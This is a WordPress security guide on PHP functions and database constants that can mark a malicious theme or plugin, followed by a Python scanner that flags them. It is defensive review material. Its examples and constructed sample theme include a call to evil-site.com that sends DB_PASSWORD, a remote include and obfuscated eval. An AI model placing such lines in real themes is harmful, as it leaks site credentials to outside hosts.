When allow_url_include is turned on, the PHP function include can be used to insert remote files into your scripts.
Plugins shouldn’t include remote files, and themes especially have no reason.
The PHP functions fopen, file_get_contents, file, and readfile can be used to read files on remote servers when allow_url_fopen is turned on. Although these functions can't be used to send data to the server directly, they can be used to pass query arguments that may contain private data. As an example:
fopen('http://www.evil-site.com/?p=');
It’s possible that a plugin might need to open remote files, but themes never should.
The PHP functions fsockopen and pfsockopen are used to open internet connections. The functions can be used to pass private information to remote servers.
The use of these functions is normal in plugins, but there's little reason for a theme to use them.
PHP has many functions for writing to files, and it’s perfectly normal for plugins to use those functions. However there’s little reason for a theme to use any of them.
The eval PHP function is used to evaluate PHP code at run time. It's normal for plugins to use the function, and in some rare circumstances a theme might need to use it too.
The variables that WordPress uses for connecting to the database are stored in the constants DB_USER, DB_PASSWORD, DB_HOST, and DB_NAME. There’s little reason for either plugins or themes to be looking at those values.
The base64_decode function can be used to hide sneaky programming code. Suspicious code can be base64 encoded, and then executed in a theme in the following manner:
eval(base64_decode('ZGllKCk='));
A normal user might notice a theme trying to do something suspicious, but when the malicious code is base64 encoded, it might go unnoticed. It might be normal for a plugin to use the function, but it’s unlikely that any theme would.
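The following added example (not part of the original text) scans theme source for the functions and constants listed above and decodes any base64 literal passed to base64_decode so a reviewer can see what it hides. The sample theme file is constructed for the example; the regular expressions and the category names are the example's own and not an official check list.

```python
import base64
import binascii
import re

# Functions and constants this page says a theme has little reason to use.
THEME_PATTERNS = {
    "remote include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"](https?|ftp)://", re.I),
    "remote fopen family": re.compile(r"\b(fopen|file_get_contents|file|readfile)\s*\(\s*['\"](https?|ftp)://", re.I),
    "socket": re.compile(r"\bp?fsockopen\s*\("),
    "file write": re.compile(r"\b(fwrite|fputs|file_put_contents)\s*\("),
    "eval": re.compile(r"\beval\s*\("),
    "db constant": re.compile(r"\bDB_(USER|PASSWORD|HOST|NAME)\b"),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")

def scan_theme_source(source):
    """Return (line_number, category, line) for each flagged line; a line can hit several categories."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for category, pattern in THEME_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, category, line.strip()))
    return hits

def decode_base64_literals(source):
    """Decode every string literal handed to base64_decode so the hidden code is visible."""
    decoded = []
    for match in B64_LITERAL.finditer(source):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append("<undecodable: %s>" % match.group(1))
    return decoded

# Constructed sample theme file built from the page's own examples (not a real theme).
SAMPLE_THEME = """<?php
get_header();
eval(base64_decode('ZGllKCk='));
include('http://www.evil-site.com/?p=');
$h = fopen('http://www.evil-site.com/?p=' . DB_PASSWORD, 'r');
fsockopen('example.invalid', 80);
file_put_contents(__DIR__ . '/cache.txt', 'x');
echo get_the_title();
"""

if __name__ == "__main__":
    for lineno, category, line in scan_theme_source(SAMPLE_THEME):
        print("line %d [%s]: %s" % (lineno, category, line))
    print("base64 literals decode to:", decode_base64_literals(SAMPLE_THEME))
```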